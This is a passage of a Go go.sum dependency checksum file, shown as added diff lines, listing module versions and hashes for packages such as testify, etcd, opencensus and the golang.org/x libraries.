h1:IGlFPqhNAPKRxohIzWpI5QEy4kuI7tcl5WvR+8qy1rU= +github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= +github.com/stretchr/objx v0.1.1/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= +github.com/stretchr/testify v1.2.2/go.mod h1:a8OnRcib4nhh0OaRAV+Yts87kKdq0PP7pXfy6kDkUVs= +github.com/stretchr/testify v1.3.0/go.mod h1:M5WIy9Dh21IEIfnGCwXGc5bZfKNJtfHm1UVUgZn+9EI= +github.com/stretchr/testify v1.4.0/go.mod h1:j7eGeouHqKxXV5pUuKE4zz7dFj8WfuZ+81PSLYec5m4= +github.com/stretchr/testify v1.5.1/go.mod h1:5W2xD1RspED5o8YsWQXVCued0rvSQ+mT+I5cxcmMvtA= +github.com/stretchr/testify v1.6.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= +github.com/stretchr/testify v1.7.0 h1:nwc3DEeHmmLAfoZucVR881uASk0Mfjw8xYJ99tb5CcY= +github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= +github.com/subosito/gotenv v1.2.0 h1:Slr1R9HxAlEKefgq5jn9U+DnETlIUa6HfgEzj0g5d7s= +github.com/subosito/gotenv v1.2.0/go.mod h1:N0PQaV/YGNqwC0u51sEeR/aUtSLEXKX9iv69rRypqCw= +github.com/tv42/httpunix v0.0.0-20150427012821-b75d8614f926/go.mod h1:9ESjWnEqriFuLhtthL60Sar/7RFoluCcXsuvEwTV5KM= +github.com/youmark/pkcs8 v0.0.0-20201027041543-1326539a0a0a h1:fZHgsYlfvtyqToslyjUt3VOPF4J7aK/3MPcK7xp3PDk= +github.com/youmark/pkcs8 v0.0.0-20201027041543-1326539a0a0a/go.mod h1:ul22v+Nro/R083muKhosV54bj5niojjWZvU8xrevuH4= +github.com/yuin/goldmark v1.1.25/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74= +github.com/yuin/goldmark v1.1.27/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74= +github.com/yuin/goldmark v1.1.32/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74= +github.com/yuin/goldmark v1.2.1/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74= +github.com/yuin/goldmark v1.3.5/go.mod h1:mwnBkeHKe2W/ZEtQ+71ViKU8L12m81fl3OWwC1Zlc8k= +github.com/yuin/goldmark v1.4.0/go.mod h1:mwnBkeHKe2W/ZEtQ+71ViKU8L12m81fl3OWwC1Zlc8k= +go.etcd.io/etcd/api/v3 v3.5.1/go.mod h1:cbVKeC6lCfl7j/8jBhAK6aIYO9XOjdptoxU/nLQcPvs= +go.etcd.io/etcd/client/pkg/v3 v3.5.1/go.mod h1:IJHfcCEKxYu1Os13ZdwCwIUTUVGYTSAM3YSwc9/Ac1g= +go.etcd.io/etcd/client/v2 v2.305.1/go.mod h1:pMEacxZW7o8pg4CrFE7pquyCJJzZvkvdD2RibOCCCGs= +go.opencensus.io v0.21.0/go.mod h1:mSImk1erAIZhrmZN+AvHh14ztQfjbGwt4TtuofqLduU= +go.opencensus.io v0.22.0/go.mod h1:+kGneAE2xo2IficOXnaByMWTGM9T73dGwxeWcUqIpI8= +go.opencensus.io v0.22.2/go.mod h1:yxeiOL68Rb0Xd1ddK5vPZ/oVn4vY4Ynel7k9FzqtOIw= +go.opencensus.io v0.22.3/go.mod h1:yxeiOL68Rb0Xd1ddK5vPZ/oVn4vY4Ynel7k9FzqtOIw= +go.opencensus.io v0.22.4/go.mod h1:yxeiOL68Rb0Xd1ddK5vPZ/oVn4vY4Ynel7k9FzqtOIw= +go.opencensus.io v0.22.5/go.mod h1:5pWMHQbX5EPX2/62yrJeAkowc+lfs/XD7Uxpq3pI6kk= +go.opencensus.io v0.23.0/go.mod h1:XItmlyltB5F7CS4xOC1DcqMoFqwtC6OG2xF7mCv7P7E= +go.opentelemetry.io/proto/otlp v0.7.0/go.mod h1:PqfVotwruBrMGOCsRd/89rSnXhoiJIqeYNgFYFoEGnI= +go.uber.org/atomic v1.7.0/go.mod h1:fEN4uk6kAWBTFdckzkM89CLk9XfWZrxpCo0nPH17wJc= +go.uber.org/mock v0.2.0 h1:TaP3xedm7JaAgScZO7tlvlKrqT0p7I6OsdGB5YNSMDU= +go.uber.org/mock v0.2.0/go.mod h1:J0y0rp9L3xiff1+ZBfKxlC1fz2+aO16tw0tsDOixfuM= +go.uber.org/multierr v1.6.0/go.mod h1:cdWPpRnG4AhwMwsgIHip0KRBQjJy5kYEpYjJxpXp9iU= +go.uber.org/zap v1.17.0/go.mod h1:MXVU+bhUf/A7Xi2HNOnopQOrmycQ5Ih87HtOu4q5SSo= +golang.org/x/crypto v0.0.0-20180904163835-0709b304e793/go.mod h1:6SG95UA2DQfeDnfUPMdvaQW0Q7yPrPDi9nlGo2tz2b4= +golang.org/x/crypto v0.0.0-20181029021203-45a5f77698d3/go.mod h1:6SG95UA2DQfeDnfUPMdvaQW0Q7yPrPDi9nlGo2tz2b4= +golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= +golang.org/x/crypto v0.0.0-20190510104115-cbcb75029529/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= +golang.org/x/crypto v0.0.0-20190605123033-f99c8df09eb5/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= +golang.org/x/crypto v0.0.0-20190820162420-60c769a6c586/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= +golang.org/x/crypto v0.0.0-20190923035154-9ee001bba392/go.mod h1:/lpIB1dKB+9EgE3H3cr1v9wB50oz8l4C4h62xy7jSTY= +golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= +golang.org/x/crypto v0.0.0-20200302210943-78000ba7a073/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= +golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= +golang.org/x/crypto v0.0.0-20210817164053-32db794688a5/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= +golang.org/x/crypto v0.21.0 h1:X31++rzVUdKhX5sWmSOFZxx8UW/ldWx55cbf08iNAMA= +golang.org/x/crypto v0.21.0/go.mod h1:0BP7YvVV9gBbVKyeTG0Gyn+gZm94bibOW5BjDEYAOMs= +golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= +golang.org/x/exp v0.0.0-20190306152737-a1d7652674e8/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= +golang.org/x/exp v0.0.0-20190510132918-efd6b22b2522/go.mod h1:ZjyILWgesfNpC6sMxTJOJm9Kp84zZh5NQWvqDGG3Qr8= +golang.org/x/exp v0.0.0-20190829153037-c13cbed26979/go.mod h1:86+5VVa7VpoJ4kLfm080zCjGlMRFzhUhsZKEZO7MGek= +golang.org/x/exp v0.0.0-20191030013958-a1ab85dbe136/go.mod h1:JXzH8nQsPlswgeRAPE3MuO9GYsAcnJvJ4vnMwN/5qkY= +golang.org/x/exp v0.0.0-20191129062945-2f5052295587/go.mod h1:2RIsYlXP63K8oxa1u096TMicItID8zy7Y6sNkU49FU4= +golang.org/x/exp v0.0.0-20191227195350-da58074b4299/go.mod h1:2RIsYlXP63K8oxa1u096TMicItID8zy7Y6sNkU49FU4= +golang.org/x/exp v0.0.0-20200119233911-0405dc783f0a/go.mod h1:2RIsYlXP63K8oxa1u096TMicItID8zy7Y6sNkU49FU4= +golang.org/x/exp v0.0.0-20200207192155-f17229e696bd/go.mod h1:J/WKrq2StrnmMY6+EHIKF9dgMWnmCNThgcyBT1FY9mM= +golang.org/x/exp v0.0.0-20200224162631-6cc2880d07d6/go.mod h1:3jZMyOhIsHpP37uCMkUooju7aAi5cS1Q23tOzKc+0MU= +golang.org/x/image v0.0.0-20190227222117-0694c2d4d067/go.mod h1:kZ7UVZpmo3dzQBMxlp+ypCbDeSB+sBbTgSJuh5dn5js= +golang.org/x/image v0.0.0-20190802002840-cff245a6509b/go.mod h1:FeLwcggjj3mMvU+oOTbSwawSJRM1uh48EjtB4UJZlP0= +golang.org/x/lint v0.0.0-20181026193005-c67002cb31c3/go.mod h1:UVdnD1Gm6xHRNCYTkRU2/jEulfH38KcIWyp/GAMgvoE= +golang.org/x/lint v0.0.0-20190227174305-5b3e6a55c961/go.mod h1:wehouNa3lNwaWXcvxsM5YxQ5yQlVC4a0KAMCusXpPoU= +golang.org/x/lint v0.0.0-20190301231843-5614ed5bae6f/go.mod h1:UVdnD1Gm6xHRNCYTkRU2/jEulfH38KcIWyp/GAMgvoE= +golang.org/x/lint v0.0.0-20190313153728-d0100b6bd8b3/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc= +golang.org/x/lint v0.0.0-20190409202823-959b441ac422/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc= +golang.org/x/lint v0.0.0-20190909230951-414d861bb4ac/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc= +golang.org/x/lint v0.0.0-20190930215403-16217165b5de/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc= +golang.org/x/lint v0.0.0-20191125180803-fdd1cda4f05f/go.mod h1:5qLYkcX4OjUUV8bRuDixDT3tpyyb+LUpUlRWLxfhWrs= +golang.org/x/lint v0.0.0-20200130185559-910be7a94367/go.mod h1:3xt1FjdF8hUf6vQPIChWIBhFzV8gjjsPE/fR3IyQdNY= +golang.org/x/lint v0.0.0-20200302205851-738671d3881b/go.mod h1:3xt1FjdF8hUf6vQPIChWIBhFzV8gjjsPE/fR3IyQdNY= +golang.org/x/lint v0.0.0-20201208152925-83fdc39ff7b5/go.mod h1:3xt1FjdF8hUf6vQPIChWIBhFzV8gjjsPE/fR3IyQdNY= +golang.org/x/lint v0.0.0-20210508222113-6edffad5e616/go.mod h1:3xt1FjdF8hUf6vQPIChWIBhFzV8gjjsPE/fR3IyQdNY= +golang.org/x/mobile v0.0.0-20190312151609-d3739f865fa6/go.mod h1:z+o9i4GpDbdi3rU15maQ/Ox0txvL9dWGYEHz965HBQE= +golang.org/x/mobile v0.0.0-20190719004257-d2bd2a29d028/go.mod h1:E/iHnbuqvinMTCcRqshq8CkpyQDoeVncDDYHnLhea+o= +golang.org/x/mod v0.0.0-20190513183733-4bf6d317e70e/go.mod h1:mXi4GBBbnImb6dmsKGUJ2LatrhH/nqhxcFungHvyanc= +golang.org/x/mod v0.1.0/go.mod h1:0QHyrYULN0/3qlju5TqG8bIK38QM8yzMo5ekMj3DlcY= +golang.org/x/mod v0.1.1-0.20191105210325-c90efee705ee/go.mod h1:QqPTAvyqsEbceGzBzNggFXnrqF1CaUcvgkdR5Ot7KZg= +golang.org/x/mod v0.1.1-0.20191107180719-034126e5016b/go.mod h1:QqPTAvyqsEbceGzBzNggFXnrqF1CaUcvgkdR5Ot7KZg= +golang.org/x/mod v0.2.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= +golang.org/x/mod v0.3.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= +golang.org/x/mod v0.4.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= +golang.org/x/mod v0.4.1/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= +golang.org/x/mod v0.4.2/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= +golang.org/x/mod v0.5.0/go.mod h1:5OXOZSfqPIIbmVBIIKWRFfZjPR0E5r58TLhUjH0a2Ro= +golang.org/x/mod v0.8.0 h1:LUYupSeNrTNCGzR/hVBk2NHZO4hXcVaW1k4Qx7rjPx8= +golang.org/x/mod v0.8.0/go.mod h1:iBbtSCu2XBx23ZKBPSOrRkjjQPZFPuis4dIYUhu/chs= +golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= +golang.org/x/net v0.0.0-20180826012351-8a410e7b638d/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= +golang.org/x/net v0.0.0-20181023162649-9b4f9f5ad519/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= +golang.org/x/net v0.0.0-20181114220301-adae6a3d119a/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= +golang.org/x/net v0.0.0-20190108225652-1e06a53dbb7e/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= +golang.org/x/net v0.0.0-20190213061140-3a22650c66bd/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= +golang.org/x/net v0.0.0-20190311183353-d8887717615a/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= +golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= +golang.org/x/net v0.0.0-20190501004415-9ce7a6920f09/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= +golang.org/x/net v0.0.0-20190503192946-f4e77d36d62c/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= +golang.org/x/net v0.0.0-20190603091049-60506f45cf65/go.mod h1:HSz+uSET+XFnRR8LxR5pz3Of3rY3CfYBVs4xY44aLks= +golang.org/x/net v0.0.0-20190613194153-d28f0bde5980/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20190628185345-da137c7871d7/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20190724013045-ca1201d0de80/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20190923162816-aa69164e4478/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20191209160850-c0dbc17a3553/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20200114155413-6afb5195e5aa/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20200202094626-16171245cfb2/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20200222125558-5a598a2470a0/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20200226121028-0de0cce0169b/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20200301022130-244492dfa37a/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20200324143707-d3edc9973b7e/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A= +golang.org/x/net v0.0.0-20200501053045-e0ff5e5a1de5/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A= +golang.org/x/net v0.0.0-20200506145744-7e3656a0809f/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A= +golang.org/x/net v0.0.0-20200513185701-a91f0712d120/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A= +golang.org/x/net v0.0.0-20200520182314-0ba52f642ac2/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A= +golang.org/x/net v0.0.0-20200625001655-4c5254603344/go.mod h1:/O7V0waA8r7cgGh81Ro3o1hOxt32SMVPicZroKQ2sZA= +golang.org/x/net v0.0.0-20200707034311-ab3426394381/go.mod h1:/O7V0waA8r7cgGh81Ro3o1hOxt32SMVPicZroKQ2sZA= +golang.org/x/net v0.0.0-20200822124328-c89045814202/go.mod h1:/O7V0waA8r7cgGh81Ro3o1hOxt32SMVPicZroKQ2sZA= +golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU= +golang.org/x/net v0.0.0-20201031054903-ff519b6c9102/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU= +golang.org/x/net v0.0.0-20201110031124-69a78807bb2b/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU= +golang.org/x/net v0.0.0-20201209123823-ac852fbbde11/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= +golang.org/x/net v0.0.0-20210119194325-5f4716e94777/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= +golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= +golang.org/x/net v0.0.0-20210316092652-d523dce5a7f4/go.mod h1:RBQZq4jEuRlivfhVLdyRGr576XBO4/greRjx4P4O3yc= +golang.org/x/net v0.0.0-20210405180319-a5a99cb37ef4/go.mod h1:p54w0d4576C0XHj96bSt6lcn1PtDYWL6XObtHCRCNQM= +golang.org/x/net v0.0.0-20210410081132-afb366fc7cd1/go.mod h1:9tjilg8BloeKEkVJvy7fQ90B1CfIiPueXVOjqfkSzI8= +golang.org/x/net v0.0.0-20210503060351-7fd8e65b6420/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= +golang.org/x/net v0.0.0-20210805182204-aaa1db679c0d/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= +golang.org/x/net v0.0.0-20210813160813-60bc85c4be6d/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= +golang.org/x/net v0.23.0 h1:7EYJ93RZ9vYSZAIb2x3lnuvqO5zneoD6IvWjuhfxjTs= +golang.org/x/net v0.23.0/go.mod h1:JKghWKKOSdJwpW2GEx0Ja7fmaKnMsbu+MWVZTokSYmg= +golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= +golang.org/x/oauth2 v0.0.0-20190226205417-e64efc72b421/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= +golang.org/x/oauth2 v0.0.0-20190604053449-0f29369cfe45/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= +golang.org/x/oauth2 v0.0.0-20191202225959-858c2ad4c8b6/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= +golang.org/x/oauth2 v0.0.0-20200107190931-bf48bf16ab8d/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= +golang.org/x/oauth2 v0.0.0-20200902213428-5d25da1a8d43/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A= +golang.org/x/oauth2 v0.0.0-20201109201403-9fd604954f58/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A= +golang.org/x/oauth2 v0.0.0-20201208152858-08078c50e5b5/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A= +golang.org/x/oauth2 v0.0.0-20210218202405-ba52d332ba99/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A= +golang.org/x/oauth2 v0.0.0-20210220000619-9bb904979d93/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A= +golang.org/x/oauth2 v0.0.0-20210313182246-cd4f82c27b84/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A= +golang.org/x/oauth2 v0.0.0-20210514164344-f6687ab2804c/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A= +golang.org/x/oauth2 v0.0.0-20210628180205-a41e5a781914/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A= +golang.org/x/oauth2 v0.0.0-20210805134026-6f1e6394065a/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A= +golang.org/x/oauth2 v0.0.0-20210819190943-2bc19b11175f/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A= +golang.org/x/oauth2 v0.0.0-20211005180243-6b3c2da341f1/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A= +golang.org/x/oauth2 v0.0.0-20211104180415-d3ed0bb246c8/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A= +golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20181108010431-42b317875d0f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20181221193216-37e7f081c4d4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20190227155943-e225da77a7e6/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20190911185100-cd5d95a43a6e/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20200317015054-43a5402ce75a/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20200625203802-6e8e738ad208/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20201020160332-67f06af15bc9/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20201207232520-09787c993a3a/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20210220032951-036812b2e83c/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sys v0.0.0-20180823144017-11551d06cbcc/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20180905080454-ebe1bf3edb33/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20181026203630-95b1ffbd15a5/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20181116152217-5ac8a444bdc5/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20181122145206-62eef0e2fa9b/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20190222072716-a9d3bda3a223/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20190312061237-fead79001313/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20190422165155-953cdadca894/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20190502145724-3ef323f4f1fd/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20190507160741-ecd444e8653b/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20190606165138-5da285871e9c/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20190624142023-c5567b49c5d0/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20190726091711-fc99dfbffb4e/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20190922100055-0a153f010e69/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20190924154521-2837fb4f24fe/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20191001151750-bb3f8db39f24/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20191008105621-543471e840be/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20191026070338-33540a1f6037/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20191204072324-ce4227a45e2e/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20191228213918-04cbcbbfeed8/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200113162924-86b910548bc1/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200116001909-b77594299b42/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200122134326-e047566fdf82/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200124204421-9fbb57f87de9/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200202164722-d101bd2416d5/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200212091648-12a6c2dcc1e4/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200223170610-d5e6a3e2c0ae/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200302150141-5c8b2ff67527/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200323222414-85ca7c5b95cd/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200331124033-c3d80250170d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200501052902-10377860bb8e/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 